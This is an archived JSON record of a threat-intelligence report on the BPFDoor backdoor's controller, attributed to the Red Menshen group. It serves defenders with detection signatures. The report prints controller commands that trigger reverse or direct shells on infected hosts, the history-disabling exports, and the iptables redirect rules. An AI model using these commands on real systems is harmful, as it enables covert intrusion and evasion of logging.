{
	"id": "31e5c233-3aae-4e4d-ac83-7fa0c190399a",
	"created_at": "2026-04-06T00:16:13.798441Z",
	"updated_at": "2026-04-10T03:33:12.101994Z",
	"deleted_at": null,
	"sha1_hash": "c842edc0b627e5c594454b71f8bd71048ea36e03",
	"title": "BPFDoors Hidden Controller Used Against Asia, Middle East Targets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 494730,
	"plain_text": "BPFDoors Hidden Controller Used Against Asia, Middle East\r\nTargets\r\nBy By: Fernando Mercês Apr 14, 2025 Read time: 10 min (2773 words)\r\nPublished: 2025-04-14 · Archived: 2026-04-05 14:54:21 UTC\r\nKey Takeaways\r\nBPFDoor is a state-sponsored backdoor designed for cyberespionage activities. Through our investigation\r\nof BPFDoor attacks, we unearthed a controller that hasn’t been observed being used anywhere else. We\r\nattribute this controller to Red Menshen, an advanced persistent threat (APT) group that Trend Micro\r\ntracks as Earth Bluecrow.\r\nThe controller could open a reverse shell. This could allow lateral movement, enabling attackers to enter\r\ndeeper into compromised networks, allowing them to control more systems or gain access to sensitive data.\r\nAccording to our telemetry, recent BPFDoor attacks zero in on the telecommunications, finance, and retail\r\nsectors, with attacks observed in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt.\r\nBPFDoor is equipped with stealthy defense evasion techniques. Trend Vision One™ Network Security has\r\nTippingPoint Intrusion Prevention and Deep Discovery Inspector (DDI) rules available to Trend Micro\r\ncustomers to protect them against this threat.\r\nWith contributions from Mohammad Mokbel, Daniel Lunghi, Feike Hacquebord, and Carl Jayson Peliña\r\nIntroduction\r\nThe stealthy rootkit-like malware known as BPFDoor (detected as Backdoor.Linux.BPFDOOR) is a backdoor\r\nwith strong stealth capabilities, most of them related to its use of Berkeley Packet Filtering (BPF).\r\nIn a previous article, we covered how BPFDoor and  BPF-enabled malware work. BPF is a technology for\r\nexecuting code in the operating system’s kernel virtual machine. It has been around for more than 20 years and\r\nreceived a lot of attention after 2014 when the eBPF (short for extended BPF at the time) was released.\r\nBPFDoor uses the packet filtering features of BPF, sometimes called classic BPF (cBPF). BPFDoor malware\r\nloads a filter that is capable of inspecting network packets in the upper layers of the operating system stack, such\r\nas netfilter (the Linux firewall) or any traffic capturing tool.\r\nThe filter loaded by BPFDoor enables the malware to be activated by network packets containing “magic\r\nsequences” – a set of byte sequences defined by the threat actor that tells the backdoor on the infected machine to\r\nperform an action. Other malware, such as Symbiote, also makes use of BPF to deliver a similar functionality.\r\nBecause of how BPF is implemented in the targeted operating system, the magic packet triggers the backdoor\r\ndespite being blocked by a firewall. As the packet reaches the kernel’s BPF engine, it activates the resident\r\nbackdoor. While these features are common in rootkits, they are not typically found in backdoors.\r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 1 of 11\n\nA backdoor like this can stay hidden in a network for a long time, and casual security sweeps such as port scans\r\nwon't see anything unusual. It also has evasion techniques, such as how it can change process names and how the\r\nbackdoor does not listen to any port, making it difficult for system administrators to suspect that something is\r\nwrong with the servers. This poses BPFDoor as a perfect tool for long-term espionage.\r\nBackground and latest targets\r\nBPFDoor has been active for at least four years, with a report by PwC mentioning multiple incidents involving it\r\nin 2021. The same report also attributed the backdoor to Red Menshen.\r\nThe said advanced persistent threat (APT) group, which Trend Micro tracks as Earth Bluecrow, is still actively\r\ntargeting companies in the Asia, Middle East, and Africa (AMEA) region according to our telemetry.\r\nDate Country Industry\r\nDecember 2024 South Korea Telecommunications\r\nDecember 2024 Myanmar Telecommunications\r\nOctober 2024 Malaysia Retail\r\nSeptember 2024 Egypt Financial services\r\nJuly 2024 South Korea Telecommunications\r\nJanuary 2024 Hong Kong Telecommunications\r\nTable 1. Country and industry distribution of companies targeted by BPFDoor in 2024\r\nThe threat actor targeted Linux servers from the aforementioned organizations. They used different paths to hide\r\nthe malware, such as /tmp/zabbix_agent.log, /bin/vmtoolsdsrv, and /etc/sysconfig/rhn/rhnsd.conf.  Investigation\r\ninto which initial entry point was used is still ongoing.\r\nAmong the targeted servers, we found a malware controller used to access other affected hosts in the same\r\nnetwork after lateral movement. In some cases, more than one server was compromised.\r\nThis shows that Earth Bluecrow is actively controlling BPFDoor-infected hosts and uploading additional tools for\r\nlater use. This specific controller file hasn’t been observed being used anywhere else.\r\nBPFDoor controller\r\nThe controller reveals some interesting details on the techniques wielded by this threat actor.\r\nBefore sending one of the “magic packets” checked by the BPF filter inserted by BPFDoor malware, the\r\ncontroller asks its user for a password that will also be checked on the BPFDoor side.\r\nDepending on the password provided and the command-line options used, the controller asks the infected machine\r\nto perform one of these actions:\r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 2 of 11\n\nOpen a reverse shell\r\nRedirect new connections to a shell on a specific port\r\nConfirm the backdoor is active\r\nBelow is a list of the supported options:\r\nOption Description\r\n-b Listen to a specified TCP port (spawn a shell if it receives a connection)\r\n-c Turn on encryption\r\n-d Destination port on the infected host (any open port)\r\n-f Set a different magic sequence for the protocols TCP or UDP\r\n-h Destination host (the infected machine to control)\r\n-i ICMP mode\r\n-l Set the remote host the infected machine will connect to (reverse shell)\r\n-m Set the local IP address as the remote host. It overwrites the -l option\r\n-n Do not use a password (check if the backdoor is alive)\r\n-o Set the magic sequence to 0x7155\r\n-p Set the password. If absent, the program will interactively ask for one\r\n-s The remote port the infected machine will connect to (reverse shell)\r\n-t Unused\r\n-u UDP mode\r\n-w TCP mode\r\n-x Set the magic sequence for ICMP\r\nThe password sent by the controller must match one of the hard-coded values in the BPFDoor sample. In the\r\nsample that was paired up with the controller we found, the malware prefixes the clear-text password with a fixed\r\nsalt, calculates its MD5 hash, and compares it with the hard-coded values, as shown in the screenshot below:\r\nApart from using different connection modes, the controller is versatile enough to control infected machines using\r\nthe three protocols supported by BPFDoor –  TCP, UDP, and ICMP.\r\nFor each protocol, it uses the hard-coded magic sequence, but it also allows the attacker to set it manually (options\r\n–f and –x), which shows the threat actor considered the change of magic bytes a likely option and made the\r\ncontroller ready to work with different BPFDoor samples.\r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 3 of 11\n\nIn addition to the magic sequence, the password must match one of the passwords expected by the running\r\nBPFDoor sample in the target. The connection can be encrypted (-c), and the right password must be provided to\r\nmake BPFDoor open a shell or listen to a port.\r\nBoth connection modes were already covered by existing articles, such as this technical analysis; meanwhile, our\r\nresearch gives a view from the controller.\r\nReverse connection mode\r\nTCP mode\r\nTo demonstrate, picture this scenario: the attacker is operating from a machine with the IP address\r\n192.168.32.133, and there's an infected machine with the IP address 192.168.32.156. The following command will\r\nask the BPFDoor running on the target's machine to open an encrypted reverse shell session with the attacker's\r\nmachine at port 8000/tcp:\r\n./controller -cd 22 –h 192.168.32.156 -ms 8000\r\nBelow is a breakdown of the command-line:\r\n-c turns on the encryption. This is optional.\r\n-d 22 sets the destination port to 22/tcp that should be opened. The host doesn't have to accept the packet.\r\nThis is just used for triggering the BPF program loaded by BPFDoor that will check the magic sequence.\r\n-h 172.16.23.129 is the target's IP address.\r\n-m sets the attacker machine's external IP address as the destination host for the reverse connection.\r\n-s 8000 sets the destination port to listen for incoming connections on the attacker machine.\r\nThe process works as follows:\r\n1. The controller sends the activation packet containing the magic bytes, the remote IP address and port for\r\nthe target to connect, and the password.\r\n2. The controller listens to port 8000/tcp due to both –m and –s 8000 options.\r\n3. The target reads the packet, and if everything is correct, it connects to the remote IP address and port. In\r\ncase –m is used, the remote IP address will be the controller's IP address.\r\n4. The reverse shell is opened.\r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 4 of 11\n\nFigure 2. Reverse connection mode process flow\r\nThe video below demonstrates our simulation to show how this process works in practice:\r\nFirst, the bottom portion of the video shows the target machine. First, we checked the target's IP address and ran a\r\nBPFDoor sample. In the same machine, we double-checked that the BPF filter is loaded with the ss command.\r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 5 of 11\n\nThen, on the attacker machine, we ran the controller and provided it with the target's IP address and the SSH port\r\nthat we know is open. After inputting the password, the reverse connection is initiated.\r\nAs the video shows, the threat actors were careful enough to disable logging from commands typed in the shell\r\nand in the MySQL command-line. This is done by the following commands:\r\nexport MYSQL_HISTFILE=/dev/null\r\nexport HISTFILE=/dev/null\r\nThis suggests they specifically look for targets running MySQL server software.\r\nAt the network level, we can see that the first TCP packet sent by the controller contains the default magic\r\nsequence for TCP 0x5293 at the beginning of the TCP payload. It also contains the \"justrobot\" password we typed\r\nin, as shown below:\r\nFigure 3. TCP packet sent by the BPFDoor controller to the target with its payload highlighted.\r\nThe highlighted lines in Figure 3 show the following:\r\n52 93 00 00 – magic bytes used with TCP: 0x5293\r\nc0 a8 20 85 – remote IP address set to 192.168.32.133 because we used the –m option\r\n1f 40 – remote port set to 8000\r\n\"justrobot” - unencrypted password\r\nDefenders should watch for TCP packets containing a 32-bit-sized 0x5293 at the beginning of a 24-byte TCP\r\npayload followed by a 32-bit IPv4 address, 16-bit port number, and a null-terminated ASCII string.\r\nHowever, it is important to note that deeper packet analysis is needed to avoid false positives. Also, the magic\r\nbytes can be easily changed by the –f and –x options. In a previous article, we also covered samples using the\r\nsequence 0x39393939 for TCP.\r\nFor the -d option, any open port would work, including UDP ones.\r\nUDP mode\r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 6 of 11\n\nThe following command uses the port 5353/udp opened by the avahi-daemon process:\r\n./controller -cud 5353 -h 192.168.32.156 -ms 8000\r\nThe only difference is the –u option that causes the controller to use UDP instead of the default TCP protocol. In\r\nthis case, defenders should look for UDP packets containing the magic sequence 0x7255 at the beginning of the\r\nUDP payload. The screenshot below shows the traffic captured in Wireshark:\r\nFigure 4. First packet sent by the BPFDoor controller containing the UDP protocol\r\nDefenders should look for UDP payloads starting with a 32-bit-sized 0x7255.\r\nICMP mode\r\nIf no TCP or UDP ports are open in a target, which is very unlikely for an internet-facing server, the attackers can\r\nstill try to connect to their targets via ICMP.  A possible command is as follows:\r\nsudo ./controller -cid 1 -h 192.168.32.156 -ms 8000\r\nWhile the port number (-d option) is required, it is insignificant in this case.\r\nFigure 5 shows the ICMP Echo request (ping) containing the 0x7255 magic sequence and the password. The\r\nreverse shell is open using TCP.\r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 7 of 11\n\nFigure 5. Packet sent by the BPFDoor controller in ICMP mode\r\nFor every infection, the password to authenticate the controller might be different. Therefore, writing either file-based or network-based detection rules that rely on the password is not effective.\r\nDirect mode\r\nTo make things easier for the threat actor, the controller has the ability to directly connect to an infected machine\r\nand get a shell on it without any reverse connections. To achieve this, a possible command line would be:\r\n./controller -cd 22 -h 192.168.32.156\r\nThe right password must be provided to activate the direct mode. Once the password is checked, BPFDoor\r\nmalware uses a series of iptables commands to redirect new connections from the controller's IP address to the\r\ndestination port (22/tcp in our example) to the first available port between 42391 and 43390 on the infected host,\r\nwhere BPFDoor will serve a shell. The commands are as follows:\r\n/sbin/iptables -I INPUT -p tcp -s \u003ccontroller IP address\u003e -j ACCEPT\r\n/sbin/iptables -t nat -A PREROUTING -p tcp -s \u003ccontroller IP address\u003e --dport \u003cdestination port\u003e -j REDIRECT -\r\n-to-ports \u003cport between 42391 and 43390\u003e\r\nThe controller waits a few seconds for the changes to take effect on the infected machine, then it tries to connect\r\nto the same IP address and port (presumably redirected at this point).\r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 8 of 11\n\nFigure 6. The controller function that directly connects to the infected machine after redirection\r\nTo avoid interruption of the legitimate service bound to the TCP port (SSH in our example), BPFDoor malware\r\ndeletes the iptables rules previously added. By the time it removes the rules, the attacker is already connected and\r\nis able to run any commands. A video from this mode at work in our lab is as follows:\r\nThe direct connection mode only works with TCP. Because the controller expects a specific response, defenders\r\nmight look for outbound TCP packets containing a 4-byte TCP payload containing the string “3458”:\r\nFigure 7. Response sent by the infected machine to a direct connection from a BPFDoor controller\r\nAttribution\r\nBased on the TTPs, target industries, the fact that this specific controller was not seen anywhere else, and its\r\nsimilarities to the coding style and programming language as the ones used in BPFDoor, we attribute the\r\ncampaign involving the controller to Earth Bluecrow with medium confidence. Since the BPFDoor malware\r\nsource code was leaked in 2022, no other campaigns could be attributed to Earth Bluecrow yet.\r\nOutlook and conclusions\r\nBPFDoor uses BPF to trigger the backdoor. There are also other malicious uses of such filters. As mentioned\r\nearlier, the Symbiote malware uses a BPF filter to prevent being detected in traffic captures.\r\nBPF opens a new window of unexplored possibilities for malware authors to exploit. As threat researchers, it is a\r\nmust to be equipped for future developments by analyzing BPF code, which will help protect organizations\r\nagainst BPF-powered threats.\r\nAlso, it is important to remember that BPF not only affects Linux systems. For example, there's a BPFDoor\r\nsample compiled for Solaris that exploits CVE-2019-3010, and there are efforts to bring eBPF to Windows. This\r\nrequires deeper research and constant vigilance to gain more insight into attacks launched in other environments.\r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 9 of 11\n\nProactive security with Trend Vision One™\r\nTrend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure\r\nmanagement, security operations, and robust layered protection. This comprehensive approach helps you predict\r\nand prevent threats, accelerating proactive security outcomes across your entire digital estate.\r\nBacked by decades of cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity\r\nAI, it delivers proven results: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security\r\nleaders can benchmark their posture and showcase continuous improvement to stakeholders.\r\nWith Trend Vision One, you’re enabled to eliminate security blind spots, focus on what matters most, and elevate\r\nsecurity into a strategic partner for innovation.\r\nTrend protections\r\nTrend Micro customers are protected from threats mentioned in the blog entry via the following rules and filters:\r\nTrend Vision One™ Network Security\r\nDeep Discovery Inspector (DDI)\r\n5360: ICMP_BPFDOOR_REQUEST.APT\r\nTippingPoint Intrusion Prevention\r\n45583: ICMP: Backdoor.Linux.Bpfdoor.USELVH222 Runtime Detection (Ingress - Activation Packet)\r\n45589: Backdoor.Linux.Bpfdoor.USELVH222 Runtime Detection (Ingress - Activation Packet)\r\n45590: Backdoor.Linux.Bpfdoor.USELVH222 Runtime Detection (Ingress - Activation Packet)\r\nTrend Vision One Threat Intelligence \r\nTo stay ahead of evolving threats, Trend Vision One customers can access a range of Intelligence Reports and\r\nThreat Insights. Threat Insights helps customers stay ahead of cyber threats before they happen and allows them to\r\nprepare for emerging threats by offering comprehensive information on threat actors, their malicious activities,\r\nand their techniques. By leveraging this intelligence, customers can take proactive steps to protect their\r\nenvironments, mitigate risks, and effectively respond to threats. \r\nTrend Vision One Intelligence Reports App [IOC Sweeping]  \r\nBPFDoor IOC used in Earth Bluecrow campaigns\r\nTrend Vision One Threat Insights App  \r\nThreat actor:  Earth Bluecrow\r\nEmerging Threats:  BPFDoor’s Hidden Controller Used Against AMEA Targets\r\nHunting Queries  \r\nTrend Vision One Search App  \r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 10 of 11\n\nTrend Vision One customers can use the Search App to match or hunt for the malicious indicators mentioned in\r\nthis blog post with data in their environment.   \r\n(tags: \"XSAE.F11533\" OR malName: BPFDOOR)\r\nAll Trend customers should look for files detected as follows:\r\nBackdoor.Linux.BPFDOOR\r\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nhttps://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/25/d/bpfdoor-hidden-controller.html"
	],
	"report_names": [
		"bpfdoor-hidden-controller.html"
	],
	"threat_actors": [
		{
			"id": "9c8a7541-1ce3-450a-9e41-494bc7af11a4",
			"created_at": "2023-01-06T13:46:39.358343Z",
			"updated_at": "2026-04-10T02:00:03.300601Z",
			"deleted_at": null,
			"main_name": "Red Menshen",
			"aliases": [
				"Earth Bluecrow",
				"Red Dev 18"
			],
			"source_name": "MISPGALAXY:Red Menshen",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434573,
	"ts_updated_at": 1775791992,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c842edc0b627e5c594454b71f8bd71048ea36e03.pdf",
		"text": "https://archive.orkl.eu/c842edc0b627e5c594454b71f8bd71048ea36e03.txt",
		"img": "https://archive.orkl.eu/c842edc0b627e5c594454b71f8bd71048ea36e03.jpg"
	}
}